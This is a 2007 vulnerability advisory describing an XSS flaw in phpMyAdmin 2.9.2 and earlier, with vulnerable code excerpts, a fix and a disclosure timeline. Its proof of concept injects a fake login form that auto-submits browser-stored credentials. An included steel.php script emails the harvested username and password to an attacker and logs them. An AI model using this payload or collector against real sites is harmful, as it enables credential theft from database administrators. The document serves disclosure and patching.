Home / os / win10

Advisory2-24012007.txt

Posted on 09 March 2007

---------------------------------------------------------------------------------
|		____   ____.__         __                       		|
|		    /   /|__|_______/  |_ __ _______  ___  ___		|
|		    Y   / |  \_  __    __  |  \__     /  /		|
|		       /  |  ||  | /|  | |  |  // __ \_>    < 		|
|		   \___/   |__||__|   |__| |____/(____  /__/\_ 		|
|            			                      /      /		|
|			     Security without illusions				|
|				   www.virtuax.be				|
|										|
---------------------------------------------------------------------------------


Application: Phpmyadmin
Vulnerable Versions: <= v2.9.2
Vulnerability: XSS

Vendor: http://www.phpmyadmin.net
Vendor Status: notified

Found: 23-01-2007
Public Release Date: 07-02-2007
Last modified: 01-03-2007
Author: AlFa

reference: http://www.virtuax.be/advisories/Advisory2-24012007.txt

=================================================================================

Special thanks to Ciri for coding that nice POC, testing and spell check =)

Shouts to RedFern, dreamer--, Shadow, r4n01 and the rest of the Virtuax Community!

=================================================================================



I. Background
-------------

"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL
over the Web. Currently it can create and drop databases, create/drop/alter tables,
delete/edit/add fields, execute any SQL statement, manage keys on fields, manage
privileges,export data into various formats and is available in 50 languages."
by phpmyadmin.net



II. Vulnerablity
----------------

The xss attack vector can be inserted in $db or $table. But the catch is that
the attack variable must be submitted together with $token otherwise it won't work.
That makes it quiet useless for session stealing but in combination with XSRF and XSS it is
possible to steal the username and password from an unsuspicious users when their credentials
are stored in the browser password manager.


The code listed below is taken from phpmyadmin 2.9.2 and may vary for older versions.


[Code=index.php (116-132)]

...
<script type="text/javascript" language="javascript">
// <![CDATA[
// definitions used in querywindow.js
var common_query = '<?php echo PMA_escapeJsString(PMA_generate_common_url('', '', '&'));?>';
var opendb_url = '<?php echo PMA_escapeJsString($GLOBALS['cfg']['DefaultTabDatabase']); ?>';
var safari_browser = <?php echo PMA_USR_BROWSER_AGENT == 'SAFARI' ? 'true' : 'false' ?>;
var querywindow_height = <?php echo PMA_escapeJsString($GLOBALS['cfg']['QueryWindowHeight']); ?>;
var querywindow_width = <?php echo PMA_escapeJsString($GLOBALS['cfg']['QueryWindowWidth']); ?>;
var collation_connection = '<?php echo PMA_escapeJsString($GLOBALS['collation_connection']); ?>';
var lang = '<?php echo PMA_escapeJsString($GLOBALS['lang']); ?>';
var server = '<?php echo PMA_escapeJsString($GLOBALS['server']); ?>';
var table = '<?php echo PMA_escapeJsString($GLOBALS['table']); ?>';
var db    = '<?php echo PMA_escapeJsString($GLOBALS['db']); ?>';
var text_dir = '<?php echo PMA_escapeJsString($GLOBALS['text_dir']); ?>';
var pma_absolute_uri = '<?php echo PMA_escapeJsString($GLOBALS['cfg']['PmaAbsoluteUri']); ?>';
// ]]>
</script>
...

[/code]



[code=./libraries/common.lib.php (1395-1412)]

...
/**
* escapes a string to be inserted as string a JavaScript block
* enclosed by <![CDATA[ ... ]]>
* this requires only to escape ' with ' and end of script block
*
* @uses    strtr()
* @param   string  $string the string to be escaped
* @return  string  the escaped string
*/
function PMA_escapeJsString($string)
{
return strtr($string, array(
'\' => '\\',
''' => '\'',
"
" => '
',
"
" => '
',
'</script' => '</' + 'script'));
}
...

[/code]


As you all can see, $db and $table are prone to and XSS attack by preleminary ending the script
with the </SCRIPT> (uppercase) tag. after that we can write javascript or if preferred html.


eg:
http://phpmyadmin.example.com/index.php?token=$token&db/table=';[XSS]
http://phpmyadmin.example.com/index.php?token=$token&db/table=</SCRIPT></head><body>[HTML]



IIa. Affected Versions
----------------------

all version >= 2.8.0 and < 2.10.x are tested and found vulnerably, presumably some older version are
also vulnerable but they weren't tested.
Tested with browsers: FF 2.0, FF 1.5, IE 6.0 and Opera 9.10



III. POC
--------

The POC is pretty simple, just log in to phpmyadmin, copypaste the (modified) URL
below and then you see the loginform with your credentials filled in (if you store store them in your browser).


http://phpmyadmin.example.com/index.php?lang=en-utf-8&token=$token&db=';//
]]></script></head><body><form method='POST'
action='steel.php' name='login_form' id='login_form'
target='_top' class='login'><fieldset><legend>Log in</legend><div
class='item'><label for='input_username'>Username:</label><input
type='text' name='pma_username' id='input_username' value='main'
size='24' class='textfield' /></div><div class='item'><label
for='input_password'>Password:</label><input type='password'
name='pma_password' id='input_password' value='' size='24'
class='textfield' /></div><input type='hidden' name='server' value='1'
/></fieldset><fieldset class='tblFooters'><input value='Go'
type='submit' /><input type='hidden' name='lang' value='en-utf-8'
/><input type='hidden' name='convcharset' value='iso-8859-1'
/></fieldset><script>setTimeout('document.login_form.submit()',1000);</script></form>//<![CDATA[
var a='

The timeout is needed because the browser takes his time to load all userinfo in to the form.
On slower computers it might be safer to use a value > 1000.

[code=steel.php]

<?php
//Get the data
$user = $_POST["pma_username"];
$pass=$_POST["pma_password"];

//Send it to our e-mail
mail("your@email", "Pass Recieved", $user.":".$pass);

//Save in a back-up file, set right perms
$file = fopen('log.txt', 'a');
fwrite($file, $user . ":". $pass . "

");
echo $user.":".$pass;
?>

[/code]


To really exploit this vulnerability is a little more difficult because of the cookie authentication method
used in phpmyadmin. But in case the domain where phpmyadmin is hosted contains XSS holes, it isn't that hard
to achieve. One could connect to the phpmyadmin trough sockets to obtain login information like the token and
cookie values and then set the right cookies at te target by using the xss hole (on the same domain where phpmyadmin
is hosted) with javascript. Then you'll just have to load the poc url (in a frame) and that should do it.
And thanx to Michael Zalewski an XSS isn't necessary anymore for FF <2.0.2 (http://lcamtuf.dione.cc/ffhostname.html).


IV. Solution
------------

A. Quickfix
Replace this code (./libraries/common.lib.php (1406-1411)):

return strtr($string, array(
'\' => '\\',
''' => '\'',
"
" => '
',
"
" => '
',
'</script' => '</' + 'script'));


with this code:

return htmlspecialchars(strtr($string, array(
'\' => '\\',
''' => '\'',
"
" => '
',
"
" => '
',
'</script' => '</' + 'script')),ENT_QUOTES);


B. upgrade to the new(er/est) version of phpmyadmin which you can find here:
http://www.phpmyadmin.net/home_page/downloads.php



V. timeline
-----------

23-01-2007: vulnerability found
24-01-2007: vendor contacted
07-03-2007: public disclosure



Copyright 2007 by Alfa from Virtuax.be All rights reserved.

 

TOP

Malware :

Exploits :